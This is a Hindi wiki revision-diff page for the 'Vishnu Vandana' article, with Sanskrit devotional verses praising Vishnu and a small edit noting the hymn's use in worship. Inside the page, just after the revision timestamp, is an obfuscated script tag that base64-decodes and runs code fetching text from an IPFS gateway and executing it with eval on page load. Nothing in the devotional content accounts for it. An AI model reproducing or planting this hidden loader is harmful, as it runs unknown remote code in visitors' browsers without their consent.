"विष्णु-वन्दना" के अवतरणों में अंतर

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
नेविगेशन पर जाएँ खोज पर जाएँ
छो (Text replace - '[[category' to '[[Category')
 
पंक्ति १: पंक्ति १:
 
{{Menu}}
 
{{Menu}}
 
==श्री विष्णु-वन्दना / Vishnu vandana==
 
==श्री विष्णु-वन्दना / Vishnu vandana==
 +
*[[विष्णु]] जी की पूजा के समय यह [[आरती पूजन|आरती]] की जाती है।
 +
 
<poem>सशंखचक्रं सकिरीटकुण्डलं
 
<poem>सशंखचक्रं सकिरीटकुण्डलं
 
सपीतवस्त्रं सरसीरुहेक्षणम्।
 
सपीतवस्त्रं सरसीरुहेक्षणम्।

०३:३३, १९ मई २०१० के समय का अवतरण

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

श्री विष्णु-वन्दना / Vishnu vandana

सशंखचक्रं सकिरीटकुण्डलं
सपीतवस्त्रं सरसीरुहेक्षणम्।
सहारवक्ष:स्थलकौस्तुभश्रियं
नमामि विष्णुं शिरसा चतुर्भुजम्।।

सर्वरूप हरि-वन्दन

यं शैवा: समुपासते शिव इति ब्रह्मेति वेदान्तिनो
बौद्धा बुद्ध इति प्रमाणपटव: कर्तेति नैयायिका:।
अर्हन्नित्यथ जैनशासनरता: कर्मेति मीमांसका:
सोऽयं लो विदधातु वांछितफलं त्रैलोक्यनाथो हरि:।।